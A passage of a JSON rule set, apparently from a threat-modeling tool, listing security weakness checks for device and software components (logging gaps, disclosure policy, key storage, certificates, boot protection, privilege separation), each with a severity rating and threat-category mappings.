control","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8e4b2af8-b023-4991-80f5-54ffa28cd616","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c4df07d3-101f-492e-9f90-70d916f7ed43","Name":"Missing log rotation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b274e8f6-5a0f-4efc-bc4e-40210c2035ad","Name":"Log file overwritten","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b0d13562-1629-4724-bb67-f910157ed1c9","Name":"Missing log evaluation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"b4c216c0-ccab-4a4d-a156-1b4979dc2aec","Name":"Missing separate location for log files","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"418fe90d-88fd-4066-9339-890501ea07f0","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c6ac1dcf-ff18-4810-ba64-10aaaf44c135","Name":"Missing central log backup","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"bd32d10e-82d6-4e7f-9247-fe2753908e60","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"f51350c5-5401-4276-a8e5-14eba86bc070","Name":"Log files contain passwords","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"71f761e4-8149-4a88-92fd-35f9d99cc0ef","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"025e828e-d1a0-4487-9c56-09fd6941d4b9","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e145ffad-ec47-4251-9fa4-1475133db2ff","Name":"Missing log entry","Description":"Missing security-relevant information for audits: login attempts, changes in user session, firmware updates, etc.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"afd4bceb-31b0-41cd-9eae-02d2eba6b41c","ThreatCategoryIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c7d5fd7a-4007-480c-a34b-cb32fab17472","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a154298a-d410-4da4-921d-906165cd5329","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"91abf825-cfca-4386-b5d5-8262423b090d","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1a582358-45c2-42e2-a21e-61206a4eda7e","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c86b6500-99cb-46e3-948f-b67b69c9768d","ComparisonType":"==","Value":false}},{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0bd863c2-5505-4226-9b28-bab9715c99d1","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"cf4a11cf-4dee-46ef-8c68-48b5dced2de0","Name":"Missing reporting system","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"23943ca9-3df9-4d69-a414-6d8fef99d30c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c46dc641-6f0f-4e80-9b80-3833f6c4f2c0","Name":"Non-disclosure","Description":"There are mainly coordinated vulnerability disclosure and non-disclosure. Coordinated vulnerability is important for independent security researchers to get reputation. Non-disclosure could possible lead to public reports without fixed vulnerabilities.","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"dd2c4c41-45f0-4105-aea4-317943e2f435","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"19f1cf08-5ab0-419c-9d56-b5d4d1fc6e24","Name":"Missing bug bounty program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"370351b8-cef2-43bf-89f2-324a814e00a3","Name":"Missing /security page","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"36e1de4b-5129-470f-b06d-208ef7610da8","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"df78de64-d35e-474f-be3b-260f60a13fc6","Name":"Missing security.txt","Description":"https://securitytxt.org/\\nhttps://en.wikipedia.org/wiki/Security.txt","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3affc4da-9a78-43ec-990b-75d20edbc410","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"ebf9833c-733d-4356-b390-e754096d0da8","Name":"Missing contact email address","Description":"E.g. security-alert, security, psirt, csirt@companydomain.com","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"543e017c-8bc2-444e-a3fb-d1dbd52ae21b","Name":"Missing public policy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"a68571c4-61b7-4a33-b5d9-104ef2c06ed0","Name":"Missing PGP key","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"61d4b9c9-19a9-431e-b114-f2c04b48846b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4f2b98fa-8173-411d-a9b9-2cb0fb31fbde","Name":"Missing timeline info","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e7d90cc4-822e-4aab-a161-c766cf13df22","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"96661040-05b5-436b-887a-f7864419d691","Name":"Missing Firmware Encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5605adab-044a-4b1f-9344-90a602d8d448","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"434d79b2-574c-4575-813b-19ec7854a139","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"96208355-0119-41f4-9b93-b0a5781e9ae1","Name":"Unnecessary components","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"dfc187d5-8287-4c8e-99bc-09cc3e26e201","Name":"Outdated OS version","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4ba05121-485a-40eb-832a-f4095c7b88df","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"49344c1a-2368-4a01-a366-023707d0b354","Name":"Secure configuration not default","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b640f7fb-fb76-4de9-bcf2-0883807f58da","Name":"Missing component update process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"36ed4680-0b94-42a9-9863-08eb976c9ebc","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"efd73610-90fd-406a-9139-82ff0552bc43","Name":"Activated services and ports","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8886f368-618b-4520-a7f5-1db3141da66b","Name":"Improper permission configuration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"16f2c70d-1752-4e7a-b1ac-5f95710c2778","Name":"Least privilege violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"],"AttackVectorID":"66c5f951-6286-4b22-a71a-ee4d6232f689"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7378780b-e280-4494-84f2-0beb4e7257ec","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"019f2476-ceca-47ab-b19e-9c2077cc35fe","Name":"Missing file system encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"85e19877-51a0-4904-8e98-b2fb14be3922","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"5d407978-73dc-45c9-8402-db692b42dae4","Name":"Improper boot order","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"eb678bc0-3ece-4937-bba3-03981c5759a4","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"10a258f6-49c0-435e-9a66-630039de0dc8","Name":"TOCTOU attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3697413-e4de-4572-90b1-8041e8ff9b67","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"61e37274-9751-4250-8a4d-6476edc8f732","Name":"Boot Code Protection in RAM","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f0a8edb7-d65f-423f-a391-120d1eb04e02","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"885834f4-b8b6-485b-8690-6ac525dbb59d","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"568a6a24-9109-4f93-b3b3-d3754260387e","Name":"Least privilege violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"66c5f951-6286-4b22-a71a-ee4d6232f689","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"5d59dab8-ca08-4359-8e7d-284dcde6d4b7","Name":"Missing application isolation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"de96008b-1c59-4319-9b5c-4f5a7e97a122","Name":"Improper input validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"337c4826-08ed-4c40-9542-54f08317ddb0","Name":"Keys not stored in security module","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"64bb2754-a187-47c8-aa93-e599f0a97a57","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"eac955da-c90f-4ca8-a1c1-bc186f7f0ad2","Name":"Key usage in untrusted environment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b43ada71-51c6-4f5e-b310-a1735a41e602","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"1267c02f-4adf-4086-9a9b-c5cc0f81c709","Name":"Missing key encryption","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a529a0c3-a98e-41be-80f5-84b876ddddc6","Name":"Missing tamper resistant unique ID","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"08ee42e8-3525-4767-98e3-f7492f356d2f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b41315d4-f62d-4133-9a38-be8097a66ebb","Name":"Missing unique user identification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"50864039-1856-432a-9ff2-0acf3cccd644","Name":"Missing privilege differentiation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"3162421f-ca5b-400d-bbe8-58a510be9abf"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cdb65d33-946e-412e-838b-3075e928c4f0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d17d5929-ebcd-4c2c-95b6-f7c8ab4c5538","Name":"Improper password storage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"984400a6-7bd6-4031-a40c-06f0499e0d86","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cffa8a3a-ec5b-4e2c-b118-80741e1c8e2a","Name":"Missing certificate chain verification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b26fc3e4-7a38-4f00-acdb-ec78246d0b25","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"20b12b0e-4031-4eb3-ad39-f91489884490","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"8bab4292-bca9-4701-8141-a62fc2b2cded","Name":"Certificate expiration","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ab8ff926-1147-4597-bded-42fbfb71edb2","Name":"Revoked certificate","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ed84da5f-3181-4be1-bef4-d911077b1910","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"135275c4-5523-4a95-a466-47947930377a","Name":"Uncleared user data","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"dbf5eca4-f98b-443d-b9a1-8113fafc962e","Name":"Password sharing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"ffd6083b-7183-472c-b250-15b0de223735","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"85519ed2-313e-4c85-85fd-f89109f845d4","Name":"Unhandled exceptions","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e36eff83-1863-4026-bffe-966a9a104331","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"871318c9-4e0c-4ff4-a475-06195ea4e3bb","Name":"Sensitive (error) information exposed ","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f7733c50-2529-459f-9397-8d06f231121c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"bf9e6225-fb28-429a-84f1-fe3be63c3d95","Name":"Sensitive (authentication) information exposed","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"157fd588-2ea2-4260-9a25-86bf8241b31c","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e2529607-c1fd-472d-ad14-c7f2cc719282","Name":"Booting manipulated 